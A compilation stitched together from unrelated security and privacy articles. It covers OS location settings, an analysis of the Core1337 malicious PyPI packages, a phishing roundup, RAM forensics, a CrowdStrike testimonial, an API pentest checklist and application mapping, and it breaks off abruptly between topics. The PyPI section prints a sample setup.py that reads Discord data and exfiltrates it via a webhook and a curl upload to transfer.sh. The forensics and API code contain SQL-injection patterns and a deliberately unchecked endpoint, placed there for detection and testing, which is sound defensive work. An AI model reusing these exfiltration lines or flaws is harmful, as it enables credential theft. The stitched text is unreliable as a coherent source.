On Windows, you can open up Settings and then choose Privacy & Security and Location. As on Android and iOS, you’ll see you can turn location tracking off for individual applications (via the toggle switches on the right) or shut it down for the entire computer (the option at the top). The same screen lets you see which apps have been using your location, and enables you to wipe the log of your travels—click Clear next to Location History to do this.
When it comes to the same process on macOS, you need to click the Apple menu and select System Settings, Privacy & Security, and Location Services. The next screen looks very similar to the Windows one, with toggle switches for individual applications as well as for macOS itself—turn off any of the switches where you don’t want location access to be given. If you click Details next to System Services on this screen, you can clear the list of “significant locations” Apple has saved for you, just like on iOS.
If location tracking is on for your computer and your browser of choice, individual websites such as Facebook, Amazon, or Google Search can know where you are as well. Sometimes this is useful, of course (for getting the right weather forecast), but there might be times when you want to turn it off if you’re trying to keep your whereabouts private.
Recently, the FortiGuard Labs team discovered several new malicious PyPI packages. They were traced back to a malware author using the handle “Core1337”, who had published a number of packages.
Here below we have mentioned the packages that are published by Core1337:-
3m-promo-gen-api
Ai-Solver-gen
hypixel-coins
httpxrequesterv2
httpxrequester
The packages were published between 27 and 29 January 2023. FortiGuard Labs found that each package published by “Core1337” had only one version and an empty description.
More alarming, all of the packages contained near-identical malicious code, which raises the question of how sophisticated the author is and what the intent behind the campaign was.
Technical Analysis of the Packages
First, the analysts noticed what looks like a webhook URL in the setup.py file:-
Each package’s setup.py contains similar code; only the webhook URL that each package sends data to differs. The URL appears to be connected to the infamous “Spidey Bot” malware.
This particular strain of malware is notorious for its ability to pilfer personal information via Discord, as highlighted in a recent blog post by the organization. The blog, entitled “Web3-Essential Package,” delves into the dangers posed by the “Spidey Bot.”
Static analysis of the setup.py script revealed several indicators of malicious intent.
Examining the script’s main function gives a general picture of the malware’s behaviour.
According to the analysts, the malware attempts to extract sensitive information from several browsers and from Discord, and stores it in a file for later exfiltration.
The “getPassw” function gathers usernames and passwords from the browser and saves them to a text file.
The malware calls itself “Fade Stealer”, writing that name at the top of the text file it produces.
Its “getCookie” function behaves much like its other functions. Based on the “Kiwi”, “KiwiFile” and “uploadToAnonfiles” functions, the malware scans specific directories, selects files by name and transfers them through a file-sharing service:-
https[:]//transfer[.]sh
All these packages have one thing in common: similar code written to carry out the same attack. The package names differ, but the underlying intent and code structure are the same, which points to a single author.
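As an added example (not part of the original article, and not FortiGuard’s tooling), the Python script below triages a setup.py the way the analysts describe: it parses the file with the standard ast module, pulls out string constants that look like Discord webhook or file-drop URLs, lists network and command-execution calls, flags code that runs at install time outside setup(), and notes the empty description the packages shared. The sample setup.py is constructed to mimic the shape described above; the webhook URL, package name, paths and function names are placeholders, not the real Core1337 code.

```python
import ast
import re

# Constructed sample shaped like the packages described above (hypothetical content;
# the webhook URL, paths and package name are placeholders, not the real code).
SAMPLE_SETUP_PY = r'''
from setuptools import setup
import os, base64, requests

WEBHOOK = "https://discord.com/api/webhooks/000000000000000000/EXAMPLE_TOKEN"

def _report(data):
    requests.post(WEBHOOK, json={"content": data})

def _steal():
    data = open(os.path.expanduser("~/.config/discord/Local Storage/leveldb"), "rb").read()
    _report(base64.b64encode(data).decode())
    os.system("curl -F file=@loot.txt https://transfer.sh/")

_steal()
setup(name="httpxrequesterv2", version="0.0.1", description="")
'''

# Calls that send data off-host or run commands; worth a look in any install script.
NETWORK_SINKS = {
    "requests.post", "requests.get", "urllib.request.urlopen",
    "os.system", "subprocess.run", "subprocess.call", "subprocess.Popen",
}
# Hosts matching the exfiltration described above: Discord webhooks and drop services.
SUSPICIOUS_URL = re.compile(
    r"https?://\S*?(?:discord(?:app)?\.com/api/webhooks|transfer\.sh|anonfiles\.com)", re.I
)


def _dotted(node):
    """Render requests.post / os.system style attribute chains as one dotted name."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def triage_setup_py(source):
    """Static indicators: suspicious URLs, sink calls, install-time side effects,
    and the empty description that all the packages shared."""
    tree = ast.parse(source)
    findings = {"urls": [], "sinks": [], "top_level_calls": [], "empty_description": False}
    for node in ast.walk(tree):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            if SUSPICIOUS_URL.search(node.value):
                findings["urls"].append(node.value)
        elif isinstance(node, ast.Call):
            name = _dotted(node.func)
            if name in NETWORK_SINKS:
                findings["sinks"].append(name)
            if name == "setup":
                for kw in node.keywords:
                    if (kw.arg == "description" and isinstance(kw.value, ast.Constant)
                            and kw.value.value == ""):
                        findings["empty_description"] = True
    # Statements executed merely by running setup.py (i.e. at pip install time), other than setup()
    for stmt in tree.body:
        if isinstance(stmt, ast.Expr) and isinstance(stmt.value, ast.Call):
            name = _dotted(stmt.value.func)
            if name != "setup":
                findings["top_level_calls"].append(name)
    return findings


def risk_score(findings):
    """Crude weighting: URLs to drop sites weigh most, install-time calls next."""
    return (3 * len(findings["urls"]) + len(findings["sinks"])
            + 2 * len(findings["top_level_calls"]) + int(findings["empty_description"]))


if __name__ == "__main__":
    result = triage_setup_py(SAMPLE_SETUP_PY)
    print(result, "score:", risk_score(result))
```

Because the file is only parsed, never executed, this is safe to run over a downloaded sdist before installing it; a clean setup.py that just calls setup() scores zero.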
Welcome to our February 2023 review of phishing attacks, in which we explore the latest email scams and the tactics that cyber criminals use to trick people into handing over personal data.
This month, we look at a UK government warning about a resurgence in Russian cyber attacks and concerns that the much-discussed AI programme ChatGPT could be used for fraud.
UK government warns of Russian-sponsored phishing campaign
The UK government has issued a warning amid an increase in phishing attacks stemming from Russia and Iran.
In an advisory statement, the NCSC (National Cyber Security Centre) shared details about the campaign, which appears to have been sponsored by the fraudsters’ national governments.
The researchers are most concerned about spear phishing, which is a sophisticated form of fraud. Scammers target specific individuals by researching them online – often using Facebook, LinkedIn or the website of the target’s employer.
Although spear phishing emails often contain the same clues as regular phishing scams, they have a much higher success rate. This suggests that people are more likely to assume that a message is genuine if it contains a few specific details about them, such as their name or their place of work.
The NCSC’s advisory highlights ongoing scams that were conducted throughout last year by the Russia-based group SEABORGIUM and the Iran-based group TA453, also known as APT42.
Their attacks target specific sectors within the UK, including academia, defence, governmental organisations, NGOs and thinktanks, as well as politicians, journalists and activists.
Commenting on the findings, NCSC Director of Operations Paul Chichester said: “The UK is committed to exposing malicious cyber activity alongside our industry partners and this advisory raises awareness of the persistent threat posed by spear-phishing attacks.
“These campaigns by threat actors based in Russia and Iran continue to ruthlessly pursue their targets in an attempt to steal online credentials and compromise potentially sensitive systems.
“We strongly encourage organisations and individuals to remain vigilant to potential approaches and follow the mitigation advice in the advisory to protect themselves online.”
Experts concerned that ChatGPT could be used for scams
ChatGPT has taken the Internet by storm, with the AI-backed tool helping writers and hobbyists create content almost instantly.
The program’s advanced language model has been championed by people looking to quickly produce quotes, articles and think pieces. However, cyber security experts are warning that another group – scammers – could also embrace the technology.
As Chester Wisniewski, principal research scientist at Sophos, explained, ChatGPT can instantly produce grammatically correct and natural-looking writing, which would resolve one of the biggest challenges that scammers face when creating their baits.
“The first thing I do whenever you give me something is figuring out how to break it. As soon as I saw the latest ChatGPT release, I was like, ‘OK, how can I use this for bad things?’ I’m going to play to see what bad things I can do with it,” Wisniewski told TechTarget.
One of those ‘bad things’ that he considered was the ability for ChatGPT to create phishing scams.
“If you start looking at ChatGPT and start asking it to write these kinds of emails, it’s significantly better at writing phishing lures than real humans are, or at least the humans who are writing them,” he said.
“Most humans who are writing phishing attacks don’t have a high level of English skills, and so because of that, they’re not as successful at compromising people.
“My concerns are really how the social aspect of ChatGPT could be leveraged by people who are attacking us. The one way we’re detecting them right now is we can tell that they’re not a professional business.
“ChatGPT makes it very easy for them to impersonate a legitimate business without even having any of the language skills or other things necessary to write a well-crafted attack.”
Can you spot a scam?
All organisations are vulnerable to phishing, no matter their size or sector, so it’s essential to understand how you might be targeted and what you can do to prevent a breach.
This 45-minute course uses real-world examples like the ones we’ve discussed here to explain how phishing attacks work, the tactics that cyber criminals use and how you can detect malicious emails.
The field of computer Forensics Analysis involves identifying, extracting, documenting, and preserving information that is stored or transmitted in an electronic or magnetic form (that is, digital evidence).
Forensics Analysis – Volatile Data:
The data that is held in temporary storage in the system’s memory (including random access memory, cache memory, and the onboard memory of system peripherals such as the video card or NIC) is called volatile data because the memory is dependent on electric power to hold its contents.
When the system is powered off or if power is disrupted, the data disappears.
After capturing the live contents of RAM, we will analyse it with the Belkasoft Evidence Center Ultimate tool.
Acquisition of live Volatile Memory:
Run the tool as an administrator and start the capture.
Belkasoft RAM Capture
Dump File Format:
After a successful capture of live RAM, the file will be saved with the .mem extension.
Dumping File
Evidence File Analyser:
The Belkasoft Evidence Center Ultimate tool is used to analyse the volatile memory.
Evidence Analyzer
A forensic examiner or Incident Responder should record everything about the physical device’s appearance, Case number, Model Number of Laptop or Desktop, etc.
Data Storage
Click the Ram Image and enter the path of the .mem file which is a live ram dump file.
Malicious Activities on the Public website
In the picture above, the attacker is attempting SQL injection against a public website.
Anonymous Vpn
In the figure above, the attacker installed and ran a VPN client to hide the source IP address.
Mail Inbox
The attacker logged on to public webmail services, and the forensic examiner can now read the inbox contents recovered from memory.
Recent File Accessed
The directory paths the attacker accessed most recently. The forensic examiner should prioritise these paths when looking for suspicious files.
Pictures
Pictures recently downloaded from websites are still held in cache memory.
Many relatively new tools have been developed to recover and dissect the information that can be gleaned from volatile memory.
This is a relatively new and fast-growing field, and many forensic analysts do not know about or take advantage of these tools.
Volatile memory may contain many pieces of information relevant to a forensic investigation, such as passwords, cryptographic keys, and other data.
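The screenshots above show the analyst reading URLs, mailbox contents, file paths and an injection attempt out of the dump through a GUI. As an added example (not part of the original article, and not Belkasoft’s code), the Python below does the equivalent first pass over a raw .mem image by hand: it carves printable ASCII strings and UTF-16LE strings (Windows keeps many in-memory strings as wide characters) and runs indicator patterns over them. The dump bytes are constructed inline so the script runs offline; carve_file() applies the same triage to a real .mem file.

```python
import re

# Constructed fragment standing in for a raw .mem image (not a real dump): binary
# noise around the kinds of artefacts the screenshots above show.
SAMPLE_DUMP = (
    b"\x00\x00MZ\x90\x00" * 4
    + b"GET /products.php?id=1' OR '1'='1 HTTP/1.1\r\nHost: shop.example\r\n\x00\x00"
    + b"https://webmail.example/inbox?user=attacker@example.com\x00"
    + b"C:\\Users\\victim\\Downloads\\payload.exe\x00\xff\xfe"
    + "UNION SELECT".encode("utf-16-le")   # a wide (UTF-16LE) string, as Windows stores them
    + b"\x00\x00openvpn.exe --config anon.ovpn\x00"
)

# Indicator patterns, applied to carved strings (bytes patterns, so no decoding needed).
PATTERNS = {
    "url": re.compile(rb'https?://[\w.-]+(?:/[^\s\x00"<>]*)?'),
    "email": re.compile(rb"[\w.+-]+@[\w-]+\.[\w.-]+"),
    "win_path": re.compile(rb"[A-Za-z]:\\(?:[^\\\x00\r\n]+\\)*[^\\\x00\r\n]+"),
    "sqli": re.compile(rb"(?i)(?:'\s*or\s*'1'\s*=\s*'1|union\s+select|sleep\(\d+\)|;\s*drop\s+table)"),
    "process": re.compile(rb"[\w-]+\.exe(?:\s+[\w.-]+)*"),
}


def carve_strings(dump, min_len=4):
    """Return printable runs from the image as bytes: plain ASCII runs, plus UTF-16LE
    runs decoded back to ASCII so the same patterns apply to both."""
    ascii_re = re.compile(rb"[\x20-\x7e\r\n]{%d,}" % min_len)
    wide_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    runs = ascii_re.findall(dump)
    runs += [w.decode("utf-16-le").encode("ascii") for w in wide_re.findall(dump)]
    return runs


def extract_iocs(dump):
    """Apply every indicator pattern to every carved string; results sorted and de-duplicated."""
    hits = {name: set() for name in PATTERNS}
    for s in carve_strings(dump):
        for name, pat in PATTERNS.items():
            for m in pat.findall(s):
                hits[name].add(m.decode("ascii", "replace"))
    return {name: sorted(vals) for name, vals in hits.items()}


def carve_file(path):
    """Same triage over a real .mem dump. Reads the whole file into memory, which is
    fine for a workstation image; chunk it for multi-GB server dumps."""
    with open(path, "rb") as fh:
        return extract_iocs(fh.read())


if __name__ == "__main__":
    for kind, values in extract_iocs(SAMPLE_DUMP).items():
        print(f"{kind:9s} {values}")
```

This is deliberately the cheap pass: it gives the examiner leads (who the attacker mailed, what they typed at the target site, what ran) in seconds, before the heavier structured parsing of process lists and handles that a full memory-forensics suite performs.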
Identity isn’t a security problem — it’s the security problem.
This was the takeaway from my recent meeting with a local government CISO in the Washington, D.C. area. Tasked with protecting infrastructure, including the fire and police departments, the CISO turned to CrowdStrike a year ago for endpoint and identity protection.
The CISO outlined the main challenge his team faced: the managed detection and response (MDR) solution in use at the time was unable to keep up with modern security demands. The tool didn’t deliver the speed or fidelity he needed. Nor did it provide remediation, leading to long delays between when the tool sent data to the management console and when his thinly stretched security team could investigate and triage alerts.
CrowdStrike Falcon® Complete solved these problems by providing a bundle of Falcon modules on AWS GovCloud, complete with a virtual team of experts to administer the technology and quickly eliminate threats.
“There’s a complete difference between our previous MDR and CrowdStrike Falcon Complete. One gives me work to do. The other tells me the work is done.” –CISO, A county in the Washington, D.C. area
Identity Is the New Perimeter
Of everything the CISO shared, it was the identity piece that really stood out to me. According to the CrowdStrike 2022 Global Threat Report, nearly 80% of cyberattacks leveraged compromised credentials — a trend the county sees regularly, he said.
With Falcon Complete, the CISO gets CrowdStrike Falcon® Identity Threat Protection to stop identity-based attacks, both through services performed by CrowdStrike and via work done by his security operations center (SOC) team.
Check out this live attack and defend demo by the Falcon Complete team to see Falcon Identity Threat Protection in action.
Below are nine use cases for the identity protection capability, in his own words.
1. We receive executive-level key metrics on identity risks. Falcon Identity Threat Protection provides us immediate value with real-time metrics on total compromised passwords, stale accounts and privileged accounts. As these numbers decrease, our risk and expenditures drop as well, allowing us to prove the value of our cybersecurity investments to stakeholders.
2. We get powerful policies and analytics. Falcon Identity Threat Protection helped us move away from reactive, once-a-year privileged account analysis to proactive real-time analysis of all of our identities, including protocol usage such as Remote Desktop Protocol (RDP) to DCs/critical servers. Many attacks leverage compromised stale accounts, and with Falcon Identity Threat Protection we can monitor and be alerted to stale accounts that become active.
3. We can stop malicious authentications. With Falcon Identity Threat Protection, we can enforce frictionless, risk-based multifactor authentication (MFA) when a privileged user remotely connects to a server — stopping adversaries trying to move laterally. Additionally, we can define policies to reset passwords or block/challenge an authentication from stale or high-risk accounts.
“I’ve bought a lot of cyber tools. My analysts unanimously thanked me the day we bought CrowdStrike.”
4. We can alert system admins to critical issues. Adversaries often target critical accounts. Instead of simply alerting the security team, Falcon Identity Threat Protection allows us to flag critical accounts with specific policies and alerts that can be sent directly to the account owner. For example, the owner of a critical admin account for our organization’s financial systems can be alerted to anomalous behavior around that account, eliminating the need for the security team to reach out to her for every alert.
5. We can investigate behavior and hygiene issues. When reviewing RDP sessions from the last 24 hours, we noticed a former employee, Steve Smith (names changed), remotely accessing a server in our environment from Jane Doe’s computer. Upon investigation, we found Jane Doe was legitimately using Steve Smith’s credentials to perform business functions that Steve was no longer around to perform. We immediately tied Jane’s account to Steve’s to trigger MFA for any authentication. We also reviewed Steve’s permissions and noticed he had extensive local administrator privileges to over 600 computers, which we were able to remove instantly.
6. We can eliminate attack paths to critical accounts. It takes only one user’s credentials to compromise your organization. In previous phishing campaigns that asked users to reset their passwords, 7% of our employees entered their username and password into a fake Microsoft login screen. Falcon Identity Threat Protection shows us how one username and password dump from a single machine can lead to the compromise of a highly privileged account, allowing for full, unfettered access to an enterprise network. We now have the ability to visualize how a low-level account compromise can lead to a full-scale breach.
“Within two hours of deploying Falcon Identity Threat Protection, we identified 10 privileged accounts with compromised passwords and began resetting them immediately.”
7. We gain awareness of AD incidents. With Falcon Identity Threat Protection, we can now see credential scanning and password attacks on all of our external-facing systems that link to our Microsoft AD and Azure AD logins.
8. We can verify if lockouts are actually malicious. Every day, we face a handful of account lockouts, mostly due to users forgetting their passwords or a system that continues to authenticate after the user has reset their password. With Falcon Identity Threat Protection, we can see all account lockouts and failed authentications, allowing us to immediately understand why a lockout occurred and if malicious activity was involved.
9. We can correlate endpoint and identity activity. Once an alert fires off regarding a potentially misused identity, such as a stale account becoming active after 90+ days of inactivity, we can correlate this information with endpoint-related detections. We simply grab the hostname where the stale account became active, pivot to CrowdStrike Falcon® Insight XDR, and look for malicious activity and detections on a specific machine. Likewise, if a machine becomes infected, we can use Falcon Identity Threat Protection to investigate who has access to that machine and whether their behavior is normal. This integration is not only unique but essential with identity-based attacks.
“CrowdStrike not only revolutionized the way our SOC operates, it changed the way I sleep at night.”
API security is an undervalued but crucial aspect of information security. Some of the most common cyber attacks exploit APIs and web applications, and if organisations are to stay secure, they must test their systems to identify and eradicate weaknesses.
Organisations can achieve this with API penetration tests. An ethical hacker (or ‘penetration tester’) will examine your applications using the same techniques that a cyber criminal would use. This gives you a real-world insight into the way someone might compromise your systems.
Web application and API tests look specifically at security vulnerabilities introduced during the development or implementation of software or websites. There is no single checklist of how exactly the test should be conducted, but there are general guidelines.
Benefits of API penetration testing
The primary purpose of an API penetration test is to protect your organisation from data breaches. This is crucial given the increased risk of cyber attacks in recent years; according to a UK government report, 39% of surveyed organisations said they suffered a security breach in the past year.
By conducting an API penetration test, you will gain a real-world overview of one of the biggest security threats that organisations face. The tester will use their experience to provide guidance on specific risks and advise you on how to address them.
But penetration tests aren’t only about closing security vulnerabilities. Mitigating the risk of security incidents has several other benefits. For instance, you protect brand loyalty and corporate image by reducing the likelihood of a costly and potentially embarrassing incident.
Penetration testing also helps you demonstrate to clients and potential partners that you take cyber security seriously. This gives you a competitive advantage and could help you land higher-value contracts.
Perhaps most notably, penetration testing is a requirement for several laws and regulations. Article 32 of the GDPR (General Data Protection Regulation), for example, mandates that organisations regularly test and evaluate the effectiveness of their technical and organisational measures employed to protect personal data.
Likewise, if your organisation is subject to the PCI DSS (Payment Card Industry Data Security Standard), you must conduct external penetration tests at least once per year and after any significant changes are made to your systems.
API penetration testing checklist
IT Governance has its own proprietary checklist when conducting API and web application penetration tests.
The system is modelled on the OSSTMM (Open Source Security Testing Methodology Manual) and the OWASP (Open Web Application Security Project) methodologies.
A high-level overview of our process is outlined below, with a brief description of what is assessed during each section.
1. Authentication
The penetration tester ensures that appropriate mechanisms are in place to confirm a user’s identity. They then review how the authentication process works and use that information to attempt to circumvent the authentication mechanism.
2. Authorisation
The tester verifies that access to resources is provided only to those permitted to use them.
Once roles and privileges are understood, the tester attempts to bypass the authorisation schema, finding path-traversal vulnerabilities and ways to escalate the privileges assigned to the tester’s user role.
3. Session management
The tester ensures that effective session management configurations are implemented. This broadly covers anything from how user authentication is performed to what happens when logging out.
4. Input validation and sanitisation
The tester checks that the application appropriately validates and sanitises all input from the user or the environment before using it.
This includes checking common input validation vulnerabilities such as cross-site scripting and SQL injection, as well as other checks such as file uploads, antivirus detection and file download weaknesses.
5. Server configuration
The tester analyses the deployed configuration of the server that hosts the web application. They then verify that the application server has gone through an appropriate hardening process.
6. Encryption
The tester assesses the encryption protecting data in transit. This includes checking for common weaknesses in SSL/TLS configurations and verifying that all sensitive data is transferred securely.
7. Information leakage
The tester reviews the application configuration to ensure that information is not being leaked.
This is assessed by reviewing configurations and examining how the application communicates to discover any information disclosure that could cause a security risk.
8. Application workflow
The tester determines whether the application processes and workflows can be bypassed.
Tests are conducted to ensure that application workflows cannot be bypassed by either tampering with the parameters or forcefully browsing. This ensures the integrity of the data.
9. Application logic
The tester analyses how the application uses, stores and maintains data. They do this by checking the underlying technology and any mitigating controls that may affect the risk to the application.
10. Report
The tester documents their findings. The report contains an executive summary, which provides a high-level, non-technical summary of any identified vulnerabilities, alongside a summary of the organisation’s business risks and an overall risk rating.
It also contains a comprehensive review of testing details, such as the scope of the assessment, descriptions of the vulnerabilities identified and their impact, plus proofs of concept that support the findings.
Finally, the report provides the tester’s commentary, where they discuss the issues identified and how the vulnerabilities could be linked within an attack chain. This is supplemented with remediation advice and supporting references.
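As an added example (not the checklist’s own tooling, and not code from IT Governance), the Python below shows what steps 1 and 2 look like when automated against an API. An in-process mock API stands in for the target; its /invoices endpoint deliberately checks that the caller is authenticated but not that the caller owns the object, the kind of authorisation flaw step 2 is meant to surface. The checks confirm that unauthenticated calls are refused, that a low-privilege user cannot reach the admin endpoint, and that one user cannot read another user’s objects. All tokens, paths and records are constructed.

```python
# Constructed in-process mock of the API under test (hypothetical tokens, paths and records).
USERS = {"tok-alice": "alice", "tok-bob": "bob", "tok-admin": "admin"}
ORDERS = {101: {"owner": "alice", "total": 42}, 202: {"owner": "bob", "total": 17}}
INVOICES = {7: {"owner": "alice", "pdf": "inv-7.pdf"}}


def mock_api(method, path, token):
    """Return (status, body). /orders/<id> checks ownership; /invoices/<id> only checks
    that the caller is logged in: the deliberate authorisation bug the test should find.
    `method` is accepted to mirror a real client call but only GET is modelled."""
    user = USERS.get(token)
    if user is None:
        return 401, {"error": "unauthenticated"}
    parts = path.strip("/").split("/")
    if len(parts) == 2 and parts[0] == "orders" and parts[1].isdigit():
        order = ORDERS.get(int(parts[1]))
        if order is None:
            return 404, {}
        if order["owner"] != user and user != "admin":
            return 403, {"error": "forbidden"}
        return 200, order
    if len(parts) == 2 and parts[0] == "invoices" and parts[1].isdigit():
        inv = INVOICES.get(int(parts[1]))          # missing: owner check
        return (200, inv) if inv else (404, {})
    if parts == ["admin", "users"]:
        return (200, sorted(USERS.values())) if user == "admin" else (403, {})
    return 404, {}


# Objects the tester has enumerated while mapping the API: (path, token of the legitimate owner)
RESOURCES = [("/orders/101", "tok-alice"), ("/orders/202", "tok-bob"), ("/invoices/7", "tok-alice")]


def check_unauthenticated(api, paths, bad_token="tok-invalid"):
    """Step 1: every protected path must answer 401 to a bogus token. Returns the ones that don't."""
    return [p for p in paths if api("GET", p, bad_token)[0] != 401]


def check_vertical_privilege(api, admin_paths, low_priv_token):
    """Step 2 (privilege escalation): admin-only paths a low-privilege token can read."""
    return [p for p in admin_paths if api("GET", p, low_priv_token)[0] == 200]


def check_object_authz(api, resources, attacker_token):
    """Step 2 (horizontal): fetch each object as its owner for a baseline, then as the
    attacker; a 200 carrying the same body means the object reference is not authorised.
    Run this with an ordinary user's token, not an admin's, or legitimate access is flagged."""
    findings = []
    for path, owner_token in resources:
        if owner_token == attacker_token:
            continue
        owner_status, owner_body = api("GET", path, owner_token)
        if owner_status != 200:
            continue          # no baseline: the owner cannot read it either
        att_status, att_body = api("GET", path, attacker_token)
        if att_status == 200 and att_body == owner_body:
            findings.append({"path": path, "attacker": attacker_token, "leaked": att_body})
    return findings


if __name__ == "__main__":
    print("unauth gaps:", check_unauthenticated(mock_api, [p for p, _ in RESOURCES]))
    print("vertical:", check_vertical_privilege(mock_api, ["/admin/users"], "tok-bob"))
    print("horizontal:", check_object_authz(mock_api, RESOURCES, "tok-bob"))
```

Against a real target, mock_api is replaced by a function that issues the HTTP request with the given bearer token and returns (status, parsed body); the three checks stay the same. Comparing the attacker’s response body to the owner’s baseline, rather than just the status code, avoids false positives from endpoints that return 200 with an empty or redacted body.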
Application security refers to the measures taken to protect the confidentiality, integrity, and availability of an application and its associated data. This involves designing, developing, and deploying applications in a secure manner and protecting them against threats such as hacking, malware, and data theft. It also involves the use of application security testing tools, as well as ongoing monitoring and management to detect and respond to security incidents.
Application security aims to prevent unauthorized access to an application and its data, and to ensure the privacy and security of sensitive information processed by the application. This is essential for organizations to maintain the trust of their customers, partners, and stakeholders, and to comply with industry regulations and standards.
What Is Application Mapping?
Application mapping is the process of creating a visual representation of the components, relationships, and interactions of a software application. It helps to identify potential security vulnerabilities and areas of risk, and can be used to support security testing, incident response, and overall application security planning.
Application mapping can be performed manually or with the use of automated tools and typically includes a diagram that shows the various components of the application, such as the user interface, database, and server, and how they interact with each other. This information can be used to create a comprehensive understanding of the application architecture and to develop and implement effective security controls.
How Application Mapping Can Boost Application Security
Application mapping can boost application security by providing a comprehensive understanding of the application’s architecture, data flow, and interactions between components. This information can be used to identify potential security risks and vulnerabilities and to implement appropriate application security measures to mitigate these risks. Here are some specific ways that application mapping can boost application security:
Identification of sensitive data: By creating a visual representation of the flow of data within an application, application mapping can help to identify sensitive data and the components that handle this data. This information can be used to ensure that sensitive data is properly protected and that the appropriate security measures are in place to secure the data.
Improved threat modeling: Threat modeling is the process of identifying potential security risks and vulnerabilities within an application. Application mapping can provide a clear understanding of the application’s architecture, components, and data flow, making it easier to identify potential security risks and vulnerabilities.
Better access control: Application mapping can be used to identify the relationships between different components and to understand the flow of data within the application. This information can be used to implement better access controls, such as role-based access controls, to ensure that sensitive data is only accessible by authorized users.
Improved network segmentation: By creating a visual representation of the application’s architecture and data flow, application mapping can be used to identify the components that are communicating with each other and the flow of data between these components. This information can be used to improve network segmentation and to ensure that sensitive data is only accessible by authorized components.
Better incident response: In the event of a security incident, application mapping can provide a clear understanding of the application’s architecture and data flow, making it easier to respond to the incident and restore the application to a secure state.
Application Mapping Best Practices
Recognize All Types of Dependencies
Identifying all types of dependencies is a crucial step in the application mapping process. Dependencies between components can greatly impact the security of an application, so it is important to understand all of these relationships. There are three types of dependencies that should be recognized in application mapping:
Functional dependencies: These describe the relationships between components that perform specific functions. For example, a user interface component may depend on a database component to store and retrieve data. By recognizing functional dependencies, organizations can understand how changes to one component can impact the overall functionality of the application.
Data dependencies: These describe the relationships between components that exchange data. For example, an application component may receive data from an external source, such as a web service, and pass that data to another component for processing. By recognizing data dependencies, organizations can understand how sensitive data flows through the application and identify areas where data may be vulnerable to attack.
Security dependencies: These describe the relationships between security controls and the components they protect. For example, a firewall may protect an application server, or encryption may protect sensitive data in transit. By recognizing security dependencies, organizations can understand the overall security posture of the application and identify areas where security controls may be insufficient or missing.
Actively Avoid Dependencies When Possible
By reducing the number of dependencies between components, organizations can minimize the attack surface and simplify security management. Here are a few ways that dependencies can be reduced:
Removing unnecessary components: Unnecessary components can increase the attack surface and the complexity of security management. By removing these components, organizations can reduce the number of dependencies and simplify the application architecture.
Limiting access to components: Limiting access to components, such as by restricting network access or implementing access controls, can reduce the number of dependencies and minimize the attack surface. For example, by limiting access to a database component to only the components that need to access it, organizations can reduce the number of potential attack vectors.
Simplifying interactions between components: Complex interactions between components can increase the risk of security vulnerabilities and make it more difficult to manage security. By simplifying these interactions, organizations can reduce the number of dependencies and improve the overall security of the application.
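To make the three dependency types and the effect of removing a component concrete, here is an added Python example (not code from the original article) that models a small constructed application map as a graph and answers three questions a reviewer would put to it: which sensitive components are reachable from internet-exposed ones through functional or data dependencies, which sensitive components have no security dependency protecting them, and how many dependencies disappear when a component is dropped. All component names and edges are hypothetical.

```python
from collections import defaultdict, deque

# Constructed application map (hypothetical names). Each component records
# whether it handles sensitive data and whether it is reachable from the internet.
COMPONENTS = {
    "web-ui":        {"handles_sensitive": False, "internet_exposed": True},
    "legacy-export": {"handles_sensitive": False, "internet_exposed": True},
    "waf":           {"handles_sensitive": False, "internet_exposed": True},
    "tls-gateway":   {"handles_sensitive": False, "internet_exposed": False},
    "payment-api":   {"handles_sensitive": True,  "internet_exposed": False},
    "customer-db":   {"handles_sensitive": True,  "internet_exposed": False},
    "report-svc":    {"handles_sensitive": True,  "internet_exposed": False},
}

# (source, target, kind). For "functional" and "data" edges the source calls or
# sends data to the target; for "security" edges the source is a control that
# protects the target.
DEPENDENCIES = [
    ("web-ui", "payment-api", "functional"),
    ("payment-api", "customer-db", "data"),
    ("report-svc", "customer-db", "data"),
    ("legacy-export", "customer-db", "data"),
    ("waf", "web-ui", "security"),
    ("tls-gateway", "payment-api", "security"),
]


def build_graph(deps, kinds=("functional", "data")):
    """Adjacency list over the edge kinds that move requests or data."""
    adj = defaultdict(set)
    for src, dst, kind in deps:
        if kind in kinds:
            adj[src].add(dst)
    return adj


def reachable_from(start, adj):
    """Breadth-first walk returning every component reachable from start."""
    seen, queue = set(), deque([start])
    while queue:
        node = queue.popleft()
        for nxt in adj[node]:
            if nxt not in seen:
                seen.add(nxt)
                queue.append(nxt)
    return seen


def exposed_sensitive_paths(components, deps):
    """For each internet-exposed component, the sensitive components it can reach
    through functional or data dependencies (the paths to review first)."""
    adj = build_graph(deps)
    result = {}
    for name, attrs in components.items():
        if attrs["internet_exposed"]:
            hits = sorted(n for n in reachable_from(name, adj)
                          if components[n]["handles_sensitive"])
            if hits:
                result[name] = hits
    return result


def unprotected_sensitive(components, deps):
    """Sensitive components that no security dependency points at."""
    protected = {dst for _, dst, kind in deps if kind == "security"}
    return sorted(n for n, a in components.items()
                  if a["handles_sensitive"] and n not in protected)


def dependency_count(deps, component):
    """Edges touching a component: removing the component removes this many."""
    return sum(1 for s, d, _ in deps if component in (s, d))


def without_component(components, deps, name):
    """The map after removing one component and every edge that touched it."""
    comps = {k: v for k, v in components.items() if k != name}
    edges = [e for e in deps if name not in (e[0], e[1])]
    return comps, edges


if __name__ == "__main__":
    print("exposed -> sensitive:", exposed_sensitive_paths(COMPONENTS, DEPENDENCIES))
    print("unprotected sensitive:", unprotected_sensitive(COMPONENTS, DEPENDENCIES))
    comps, edges = without_component(COMPONENTS, DEPENDENCIES, "legacy-export")
    print("after removing legacy-export:", exposed_sensitive_paths(comps, edges))
```

In the constructed map the report service and the customer database handle sensitive data but have no security dependency pointing at them, and the legacy export component gives a second internet-facing path straight to the database; removing it takes that path off the map, which is exactly the "remove unnecessary components" step above expressed as a graph operation.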
Strive To Test Everything
Testing all components and interactions represented in the application map is essential to identify security vulnerabilities and ensure that they are addressed. Here are a few reasons why comprehensive testing is important:
Prioritize testing efforts: Application mapping provides a roadmap for comprehensive security testing, which can be used to prioritize testing efforts and ensure that all areas of the application are tested. This can help organizations focus their testing efforts on the most critical components and interactions.
Identify vulnerabilities: By testing all components and interactions, organizations can identify security vulnerabilities that may otherwise be overlooked. This can include vulnerabilities in the functionality of individual components, the interactions between components, and the security controls that protect them.
